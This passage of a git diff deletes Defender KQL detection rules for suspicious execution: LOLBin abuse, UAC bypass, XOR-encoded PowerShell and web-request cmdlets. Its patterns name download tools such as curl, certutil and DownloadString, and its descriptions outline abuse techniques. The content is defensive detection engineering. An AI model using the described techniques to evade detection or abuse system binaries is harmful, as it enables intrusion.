-| where (ProcessIntegrityLevel =~ "System" and InitiatingProcessFolderPath endswith "\\spoolsv.exe") and ((FolderPath endswith "\\gpupdate.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\taskkill.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\taskmgr.exe" or FolderPath endswith "\\sc.exe" or FolderPath endswith "\\findstr.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\wget.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\accesschk.exe" or FolderPath endswith "\\wevtutil.exe" or FolderPath endswith "\\bcdedit.exe" or FolderPath endswith "\\fsutil.exe" or FolderPath endswith "\\cipher.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\write.exe" or FolderPath endswith "\\wuauclt.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\query.exe") or ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") and (not(ProcessCommandLine contains "start"))) or (FolderPath endswith "\\cmd.exe" and (not((ProcessCommandLine contains ".spl" or ProcessCommandLine contains "route add" or ProcessCommandLine contains "program files")))) or (FolderPath endswith "\\netsh.exe" and (not((ProcessCommandLine contains "add portopening" or ProcessCommandLine contains "rule name")))) or ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and (not(ProcessCommandLine contains ".spl"))) or (ProcessCommandLine endswith "rundll32.exe" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")))
\ No newline at end of file
diff --git a/Execution/Suspicious_Use_of_CSharp_Interactive_Console.kql b/Execution/Suspicious_Use_of_CSharp_Interactive_Console.kql
deleted file mode 100644
index 027c40e7..00000000
--- a/Execution/Suspicious_Use_of_CSharp_Interactive_Console.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Michael R. (@nahamike01)
-// Date: 2020/03/08
-// Level: high
-// Description: Detects the execution of CSharp interactive console by PowerShell
-// Tags: attack.execution, attack.t1127
-DeviceProcessEvents
-| where FolderPath endswith "\\csi.exe" and ProcessVersionInfoOriginalFileName =~ "csi.exe" and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\powershell_ise.exe")
\ No newline at end of file
diff --git a/Execution/Suspicious_WMIC_Execution_Via_Office_Process.kql b/Execution/Suspicious_WMIC_Execution_Via_Office_Process.kql
deleted file mode 100644
index bf07a61d..00000000
--- a/Execution/Suspicious_WMIC_Execution_Via_Office_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Vadim Khrykov, Cyb3rEng
-// Date: 2021/08/23
-// Level: high
-// Description: Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).
-// Tags: attack.t1204.002, attack.t1047, attack.t1218.010, attack.execution, attack.defense_evasion
-DeviceProcessEvents
-| where (InitiatingProcessFolderPath endswith "\\WINWORD.EXE" or InitiatingProcessFolderPath endswith "\\EXCEL.EXE" or InitiatingProcessFolderPath endswith "\\POWERPNT.exe" or InitiatingProcessFolderPath endswith "\\MSPUB.exe" or InitiatingProcessFolderPath endswith "\\VISIO.exe" or InitiatingProcessFolderPath endswith "\\MSACCESS.EXE" or InitiatingProcessFolderPath endswith "\\EQNEDT32.EXE" or InitiatingProcessFolderPath endswith "\\ONENOTE.EXE" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe") and ((ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "msiexec" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "verclsid" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript") and (ProcessCommandLine contains "process" and ProcessCommandLine contains "create" and ProcessCommandLine contains "call")) and (FolderPath endswith "\\wbem\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/Execution/Suspicious_WSMAN_Provider_Image_Loads.kql b/Execution/Suspicious_WSMAN_Provider_Image_Loads.kql
deleted file mode 100644
index 11e20190..00000000
--- a/Execution/Suspicious_WSMAN_Provider_Image_Loads.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/06/24
-// Level: medium
-// Description: Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.
-// Tags: attack.execution, attack.t1059.001, attack.lateral_movement, attack.t1021.003
-DeviceImageLoadEvents
-| where (((FolderPath endswith "\\WsmSvc.dll" or FolderPath endswith "\\WsmAuto.dll" or FolderPath endswith "\\Microsoft.WSMan.Management.ni.dll") or (InitiatingProcessVersionInfoOriginalFileName in~ ("WsmSvc.dll", "WSMANAUTOMATION.DLL", "Microsoft.WSMan.Management.dll"))) or (InitiatingProcessFolderPath endswith "\\svchost.exe" and InitiatingProcessVersionInfoOriginalFileName =~ "WsmWmiPl.dll")) and (not((InitiatingProcessFolderPath startswith "C:\\Program Files\\Citrix\\" or (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\sdiagnhost.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\services.exe") or (InitiatingProcessFolderPath endswith "\\mscorsvw.exe" and (InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework64\\v" or InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework\\v")) or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\asgard2-agent\\" or InitiatingProcessFolderPath endswith "\\powershell_ise.exe" or (InitiatingProcessCommandLine contains "svchost.exe -k netsvcs -p -s BITS" or InitiatingProcessCommandLine contains "svchost.exe -k GraphicsPerfSvcGroup -s GraphicsPerfSvc" or InitiatingProcessCommandLine contains "svchost.exe -k NetworkService -p -s Wecsvc" or InitiatingProcessCommandLine contains "svchost.exe -k netsvcs") or (InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\Configure-SMRemoting.exe", "C:\\Windows\\System32\\ServerManager.exe")) or InitiatingProcessFolderPath startswith "C:\\$WINDOWS.~BT\\Sources\\"))) and (not((InitiatingProcessFolderPath endswith "\\svchost.exe" and isnull(InitiatingProcessCommandLine))))
\ No newline at end of file
diff --git a/Execution/Suspicious_WindowsTerminal_Child_Processes.kql b/Execution/Suspicious_WindowsTerminal_Child_Processes.kql
deleted file mode 100644
index 04afff03..00000000
--- a/Execution/Suspicious_WindowsTerminal_Child_Processes.kql
+++ /dev/null
@@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/25 -// Level: medium -// Description: Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section) -// Tags: attack.execution, attack.persistence -DeviceProcessEvents -| where ((InitiatingProcessFolderPath endswith "\\WindowsTerminal.exe" or InitiatingProcessFolderPath endswith "\\wt.exe") and ((FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\csc.exe") or (FolderPath contains "C:\\Users\\Public\\" or FolderPath contains "\\Downloads\\" or FolderPath contains "\\Desktop\\" or FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\Windows\\TEMP\\") or (ProcessCommandLine contains " iex " or ProcessCommandLine contains " icm" or ProcessCommandLine contains "Invoke-" or ProcessCommandLine contains "Import-Module " or ProcessCommandLine contains "ipmo " or ProcessCommandLine contains "DownloadString(" or ProcessCommandLine contains " /c " or ProcessCommandLine contains " /k " or ProcessCommandLine contains " /r "))) and (not(((ProcessCommandLine contains "Import-Module" and ProcessCommandLine contains "Microsoft.VisualStudio.DevShell.dll" and ProcessCommandLine contains "Enter-VsDevShell") or (ProcessCommandLine contains "\\AppData\\Local\\Packages\\Microsoft.WindowsTerminal_" and ProcessCommandLine contains "\\LocalState\\settings.json") or (ProcessCommandLine contains "C:\\Program Files\\Microsoft Visual Studio\\" and ProcessCommandLine contains "\\Common7\\Tools\\VsDevCmd.bat")))) \ No newline at end of file diff --git a/Execution/Suspicious_WmiPrvSE_Child_Process.kql b/Execution/Suspicious_WmiPrvSE_Child_Process.kql deleted file mode 100644 index dbebbd92..00000000 
--- a/Execution/Suspicious_WmiPrvSE_Child_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Vadim Khrykov (ThreatIntel), Cyb3rEng, Florian Roth (Nextron Systems) -// Date: 2021/08/23 -// Level: high -// Description: Detects suspicious and uncommon child processes of WmiPrvSE -// Tags: attack.execution, attack.defense_evasion, attack.t1047, attack.t1204.002, attack.t1218.010 -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\wbem\\WmiPrvSE.exe" and ((FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\verclsid.exe" or FolderPath endswith "\\wscript.exe") or ((ProcessCommandLine contains "cscript" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "pwsh" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "wscript") and FolderPath endswith "\\cmd.exe")) and (not(((ProcessCommandLine contains "/i " and FolderPath endswith "\\msiexec.exe") or FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\WmiPrvSE.exe"))) \ No newline at end of file diff --git a/Execution/Suspicious_XOR_Encoded_PowerShell_Command.kql b/Execution/Suspicious_XOR_Encoded_PowerShell_Command.kql deleted file mode 100644 index f68123c0..00000000 --- a/Execution/Suspicious_XOR_Encoded_PowerShell_Command.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Sami Ruohonen, Harish Segar, Tim Shelton, Teymur Kheirkhabarov, Vasiliy Burov, oscd.community, Nasreddine Bencherchali -// Date: 2018/09/05 -// Level: medium -// Description: Detects presence of a potentially xor encoded powershell command -// Tags: attack.defense_evasion, attack.execution, attack.t1059.001, attack.t1140, attack.t1027 -DeviceProcessEvents -| where (ProcessCommandLine contains "ForEach" or ProcessCommandLine contains "for(" or ProcessCommandLine contains "for " or ProcessCommandLine contains "-join " or ProcessCommandLine contains "-join'" or ProcessCommandLine contains "-join\"" or ProcessCommandLine contains "-join`" or ProcessCommandLine contains "::Join" or ProcessCommandLine contains "[char]") and ProcessCommandLine contains "bxor" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or ProcessVersionInfoFileDescription =~ "Windows PowerShell" or ProcessVersionInfoProductName =~ "PowerShell Core 6") \ No newline at end of file diff --git a/Execution/Suspicious_ZipExec_Execution.kql b/Execution/Suspicious_ZipExec_Execution.kql deleted file mode 100644 index 59378b3b..00000000 --- a/Execution/Suspicious_ZipExec_Execution.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2021/11/07 -// Level: medium -// Description: ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file. -// Tags: attack.execution, attack.defense_evasion, attack.t1218, attack.t1202 -DeviceProcessEvents -| where (ProcessCommandLine contains "/generic:Microsoft_Windows_Shell_ZipFolder:filename=" and ProcessCommandLine contains ".zip" and ProcessCommandLine contains "/pass:" and ProcessCommandLine contains "/user:") or (ProcessCommandLine contains "/delete" and ProcessCommandLine contains "Microsoft_Windows_Shell_ZipFolder:filename=" and ProcessCommandLine contains ".zip") \ No newline at end of file diff --git a/Execution/Sysprep_on_AppData_Folder.kql b/Execution/Sysprep_on_AppData_Folder.kql deleted file mode 100644 index 285f542e..00000000 --- a/Execution/Sysprep_on_AppData_Folder.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2018/06/22 -// Level: medium -// Description: Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec) -// Tags: attack.execution, attack.t1059 -DeviceProcessEvents -| where ProcessCommandLine contains "\\AppData\\" and FolderPath endswith "\\sysprep.exe" \ No newline at end of file diff --git a/Execution/System_Disk_And_Volume_Reconnaissance_Via_Wmic.EXE.kql b/Execution/System_Disk_And_Volume_Reconnaissance_Via_Wmic.EXE.kql deleted file mode 100644 index e0972b4b..00000000 --- a/Execution/System_Disk_And_Volume_Reconnaissance_Via_Wmic.EXE.kql +++ /dev/null 
@@ -1,10 +0,0 @@ -// Author: Stephen Lincoln `@slincoln-aiq`(AttackIQ) -// Date: 2024/02/02 -// Level: medium -// Description: An adversary might use WMI to discover information about the system, such as the volume name, size, -free space, and other disk information. This can be done using the `wmic` command-line utility and has been -observed being used by threat actors such as Volt Typhoon. - -// Tags: attack.execution, attack.discovery, attack.t1047, attack.t1082 -DeviceProcessEvents -| where (ProcessCommandLine contains "volume" or ProcessCommandLine contains "path win32_logicaldisk") and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe") \ No newline at end of file diff --git a/Execution/Tasks_Folder_Evasion.kql b/Execution/Tasks_Folder_Evasion.kql deleted file mode 100644 index 057c6541..00000000 --- a/Execution/Tasks_Folder_Evasion.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: Sreeman -// Date: 2020/01/13 -// Level: high -// Description: The Tasks folder in system32 and syswow64 are globally writable paths. -Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application -in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr - -// Tags: attack.defense_evasion, attack.persistence, attack.execution, attack.t1574.002 -DeviceProcessEvents -| where (ProcessCommandLine contains "echo " or ProcessCommandLine contains "copy " or ProcessCommandLine contains "type " or ProcessCommandLine contains "file createnew") and (ProcessCommandLine contains " C:\\Windows\\System32\\Tasks\\" or ProcessCommandLine contains " C:\\Windows\\SysWow64\\Tasks\\") \ No newline at end of file diff --git a/Execution/UAC_Bypass_Using_IDiagnostic_Profile.kql b/Execution/UAC_Bypass_Using_IDiagnostic_Profile.kql deleted file mode 100644 index 26df3a86..00000000 --- a/Execution/UAC_Bypass_Using_IDiagnostic_Profile.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/03 -// Level: high -// Description: Detects the "IDiagnosticProfileUAC" UAC bypass technique -// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceProcessEvents -| where (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessCommandLine contains " /Processid:{12C21EA7-2EB8-4B55-9249-AC243DA8C666}" and InitiatingProcessFolderPath endswith "\\DllHost.exe" \ No newline at end of file diff --git a/Execution/UAC_Bypass_Using_IDiagnostic_Profile_-_File.kql b/Execution/UAC_Bypass_Using_IDiagnostic_Profile_-_File.kql deleted file mode 100644 index 25b12cc5..00000000 --- a/Execution/UAC_Bypass_Using_IDiagnostic_Profile_-_File.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/03 -// Level: high -// Description: Detects the creation of a file by "dllhost.exe" in System32 directory part of "IDiagnosticProfileUAC" UAC bypass technique -// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceFileEvents -| where InitiatingProcessFolderPath endswith "\\DllHost.exe" and FolderPath endswith ".dll" and FolderPath startswith "C:\\Windows\\System32\\" \ No newline at end of file diff --git a/Execution/Uncommon_Child_Process_Of_Appvlp.EXE.kql b/Execution/Uncommon_Child_Process_Of_Appvlp.EXE.kql deleted file mode 100644 index b28bbd12..00000000 --- a/Execution/Uncommon_Child_Process_Of_Appvlp.EXE.kql +++ /dev/null 
@@ -1,11 +0,0 @@ -// Author: Sreeman -// Date: 2020/03/13 -// Level: medium -// Description: Detects uncommon child processes of Appvlp.EXE -Appvlp or the Application Virtualization Utility is included with Microsoft Office. Attackers are able to abuse "AppVLP" to execute shell commands. -Normally, this binary is used for Application Virtualization, but it can also be abused to circumvent the ASR file path rule folder -or to mark a file as a system file. - -// Tags: attack.t1218, attack.defense_evasion, attack.execution -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\appvlp.exe" and (not((FolderPath endswith ":\\Windows\\SysWOW64\\rundll32.exe" or FolderPath endswith ":\\Windows\\System32\\rundll32.exe"))) and (not(((FolderPath contains ":\\Program Files\\Microsoft Office" and FolderPath endswith "\\msoasb.exe") or (FolderPath contains ":\\Program Files\\Microsoft Office" and FolderPath endswith "\\MSOUC.EXE") or ((FolderPath contains ":\\Program Files\\Microsoft Office" and FolderPath contains "\\SkypeSrv\\") and FolderPath endswith "\\SKYPESERVER.EXE")))) \ No newline at end of file diff --git a/Execution/Uncommon_Child_Process_Of_BgInfo.EXE.kql b/Execution/Uncommon_Child_Process_Of_BgInfo.EXE.kql deleted file mode 100644 index 77dfd04d..00000000 --- a/Execution/Uncommon_Child_Process_Of_BgInfo.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Beyu Denis, oscd.community -// Date: 2019/10/26 -// Level: medium -// Description: Detects uncommon child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript -// Tags: attack.execution, attack.t1059.005, attack.defense_evasion, attack.t1218, attack.t1202 -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\bginfo.exe" or InitiatingProcessFolderPath endswith "\\bginfo64.exe" \ No newline at end of file 
diff --git a/Execution/Uncommon_Child_Process_Of_Defaultpack.EXE.kql b/Execution/Uncommon_Child_Process_Of_Defaultpack.EXE.kql deleted file mode 100644 index 43fcebb7..00000000 --- a/Execution/Uncommon_Child_Process_Of_Defaultpack.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/12/31 -// Level: medium -// Description: Detects uncommon child processes of "DefaultPack.EXE" binary as a proxy to launch other programs -// Tags: attack.t1218, attack.defense_evasion, attack.execution -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\DefaultPack.exe" \ No newline at end of file diff --git a/Execution/Uncommon_Child_Processes_Of_SndVol.exe.kql b/Execution/Uncommon_Child_Processes_Of_SndVol.exe.kql deleted file mode 100644 index f63cafcb..00000000 --- a/Execution/Uncommon_Child_Processes_Of_SndVol.exe.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/06/09 -// Level: medium -// Description: Detects potentially uncommon child processes of SndVol.exe (the Windows volume mixer) -// Tags: attack.execution -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\SndVol.exe" and (not((ProcessCommandLine contains " shell32.dll,Control_RunDLL " and FolderPath endswith "\\rundll32.exe"))) \ No newline at end of file diff --git a/Execution/Uncommon_One_Time_Only_Scheduled_Task_At_00_00.kql b/Execution/Uncommon_One_Time_Only_Scheduled_Task_At_00_00.kql deleted file mode 100644 index 63e818d3..00000000 --- a/Execution/Uncommon_One_Time_Only_Scheduled_Task_At_00_00.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: pH-T (Nextron Systems) -// Date: 2022/07/15 -// Level: high -// Description: Detects scheduled task creation events that include suspicious actions, and is run once at 00:00 -// Tags: attack.execution, attack.persistence, attack.privilege_escalation, attack.t1053.005 -DeviceProcessEvents -| where (ProcessCommandLine contains "wscript" or ProcessCommandLine contains "vbscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "wmic " or ProcessCommandLine contains "wmic.exe" or ProcessCommandLine contains "regsvr32.exe" or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "\\AppData\\") and (FolderPath contains "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") and (ProcessCommandLine contains "once" and ProcessCommandLine contains "00:00") \ No newline at end of file diff --git a/Execution/Unusual_Parent_Process_For_Cmd.EXE.kql b/Execution/Unusual_Parent_Process_For_Cmd.EXE.kql deleted file mode 100644 index baf4a934..00000000 --- a/Execution/Unusual_Parent_Process_For_Cmd.EXE.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Tim Rauch, Elastic (idea) -// Date: 2022/09/21 -// Level: medium -// Description: Detects suspicious parent process for cmd.exe -// Tags: attack.execution, attack.t1059 -DeviceProcessEvents -| where FolderPath endswith "\\cmd.exe" and (InitiatingProcessFolderPath endswith "\\csrss.exe" or InitiatingProcessFolderPath endswith "\\ctfmon.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe" or InitiatingProcessFolderPath endswith "\\epad.exe" or InitiatingProcessFolderPath endswith "\\FlashPlayerUpdateService.exe" or InitiatingProcessFolderPath endswith "\\GoogleUpdate.exe" or InitiatingProcessFolderPath endswith "\\jucheck.exe" or InitiatingProcessFolderPath endswith "\\jusched.exe" or InitiatingProcessFolderPath endswith "\\LogonUI.exe" or InitiatingProcessFolderPath endswith "\\lsass.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\SearchIndexer.exe" or InitiatingProcessFolderPath endswith "\\SearchProtocolHost.exe" or InitiatingProcessFolderPath endswith "\\SIHClient.exe" or InitiatingProcessFolderPath endswith "\\sihost.exe" or InitiatingProcessFolderPath endswith "\\slui.exe" or InitiatingProcessFolderPath endswith "\\spoolsv.exe" or InitiatingProcessFolderPath endswith "\\sppsvc.exe" or InitiatingProcessFolderPath endswith "\\taskhostw.exe" or InitiatingProcessFolderPath endswith "\\unsecapp.exe" or InitiatingProcessFolderPath endswith "\\WerFault.exe" or InitiatingProcessFolderPath endswith "\\wermgr.exe" or InitiatingProcessFolderPath endswith "\\wlanext.exe" or InitiatingProcessFolderPath endswith "\\WUDFHost.exe") \ No newline at end of file diff --git a/Execution/Usage_Of_Web_Request_Commands_And_Cmdlets.kql b/Execution/Usage_Of_Web_Request_Commands_And_Cmdlets.kql deleted file mode 100644 index f826a6aa..00000000 --- a/Execution/Usage_Of_Web_Request_Commands_And_Cmdlets.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger -// Date: 2019/10/24 -// Level: medium -// Description: Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine -// Tags: attack.execution, attack.t1059.001 -DeviceProcessEvents -| where ProcessCommandLine contains "[System.Net.WebRequest]::create" or ProcessCommandLine contains "curl " or ProcessCommandLine contains "Invoke-RestMethod" or ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "Net.WebClient" or ProcessCommandLine contains "Resume-BitsTransfer" or ProcessCommandLine contains "Start-BitsTransfer" or ProcessCommandLine contains "wget " or ProcessCommandLine contains "WinHttp.WinHttpRequest" \ No newline at end of file diff --git a/Execution/Use_Of_The_SFTP.EXE_Binary_As_A_LOLBIN.kql b/Execution/Use_Of_The_SFTP.EXE_Binary_As_A_LOLBIN.kql deleted file mode 100644 index 827d695b..00000000 --- a/Execution/Use_Of_The_SFTP.EXE_Binary_As_A_LOLBIN.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/11/10 -// Level: medium -// Description: Detects the usage of the "sftp.exe" binary as a LOLBIN by abusing the "-D" flag -// Tags: attack.defense_evasion, attack.execution, attack.t1218 -DeviceProcessEvents -| where (ProcessCommandLine contains " -D .." or ProcessCommandLine contains " -D C:\\") and FolderPath endswith "\\sftp.exe" \ No newline at end of file diff --git a/Execution/Use_of_FSharp_Interpreters.kql b/Execution/Use_of_FSharp_Interpreters.kql deleted file mode 100644 index ca9448e4..00000000 --- a/Execution/Use_of_FSharp_Interpreters.kql +++ /dev/null 
@@ -1,9 +0,0 @@ -// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io -// Date: 2022/06/02 -// Level: medium -// Description: Detects the execution of FSharp Interpreters "FsiAnyCpu.exe" and "FSi.exe" -Both can be used for AWL bypass and to execute F# code via scripts or inline. - -// Tags: attack.execution, attack.t1059 -DeviceProcessEvents -| where (FolderPath endswith "\\fsi.exe" or FolderPath endswith "\\fsianycpu.exe") or (ProcessVersionInfoOriginalFileName in~ ("fsi.exe", "fsianycpu.exe")) \ No newline at end of file diff --git a/Execution/Use_of_OpenConsole.kql b/Execution/Use_of_OpenConsole.kql deleted file mode 100644 index 319b54f3..00000000 --- a/Execution/Use_of_OpenConsole.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/06/16 -// Level: medium -// Description: Detects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting -// Tags: attack.execution, attack.t1059 -DeviceProcessEvents -| where (ProcessVersionInfoOriginalFileName =~ "OpenConsole.exe" or FolderPath endswith "\\OpenConsole.exe") and (not(FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal")) \ No newline at end of file diff --git a/Execution/Use_of_Pcalua_For_Execution.kql b/Execution/Use_of_Pcalua_For_Execution.kql deleted file mode 100644 index 0f9642fe..00000000 --- a/Execution/Use_of_Pcalua_For_Execution.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community -// Date: 2022/06/14 -// Level: medium -// Description: Detects execition of commands and binaries from the context of The program compatibility assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting. -// Tags: attack.execution, attack.t1059 -DeviceProcessEvents -| where ProcessCommandLine contains " -a" and FolderPath endswith "\\pcalua.exe" \ No newline at end of file diff --git a/Execution/Use_of_Scriptrunner.exe.kql b/Execution/Use_of_Scriptrunner.exe.kql deleted file mode 100644 index 0c832c20..00000000 --- a/Execution/Use_of_Scriptrunner.exe.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/01 -// Level: medium -// Description: The "ScriptRunner.exe" binary can be abused to proxy execution through it and bypass possible whitelisting -// Tags: attack.defense_evasion, attack.execution, attack.t1218 -DeviceProcessEvents -| where ProcessCommandLine contains " -appvscript " and (FolderPath endswith "\\ScriptRunner.exe" or ProcessVersionInfoOriginalFileName =~ "ScriptRunner.exe") \ No newline at end of file diff --git a/Execution/Using_SettingSyncHost.exe_as_LOLBin.kql b/Execution/Using_SettingSyncHost.exe_as_LOLBin.kql deleted file mode 100644 index a0582a37..00000000 --- a/Execution/Using_SettingSyncHost.exe_as_LOLBin.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Anton Kutepov, oscd.community -// Date: 2020/02/05 -// Level: high -// Description: Detects using SettingSyncHost.exe to run hijacked binary -// Tags: attack.execution, attack.defense_evasion, attack.t1574.008 -DeviceProcessEvents -| where (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\"))) and (InitiatingProcessCommandLine contains "cmd.exe /c" and InitiatingProcessCommandLine contains "RoamDiag.cmd" and InitiatingProcessCommandLine contains "-outputpath") \ No newline at end of file diff --git a/Execution/VBA_DLL_Loaded_Via_Office_Application.kql b/Execution/VBA_DLL_Loaded_Via_Office_Application.kql deleted file mode 100644 index 44e3afbd..00000000 --- a/Execution/VBA_DLL_Loaded_Via_Office_Application.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Antonlovesdnb -// Date: 2020/02/19 -// Level: high -// Description: Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros. -// Tags: attack.execution, attack.t1204.002 -DeviceImageLoadEvents -| where (FolderPath endswith "\\VBE7.DLL" or FolderPath endswith "\\VBEUI.DLL" or FolderPath endswith "\\VBE7INTL.DLL") and (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe") \ No newline at end of file diff --git a/Execution/VMToolsd_Suspicious_Child_Process.kql b/Execution/VMToolsd_Suspicious_Child_Process.kql deleted file mode 100644 index fcf64329..00000000 --- a/Execution/VMToolsd_Suspicious_Child_Process.kql +++ /dev/null 
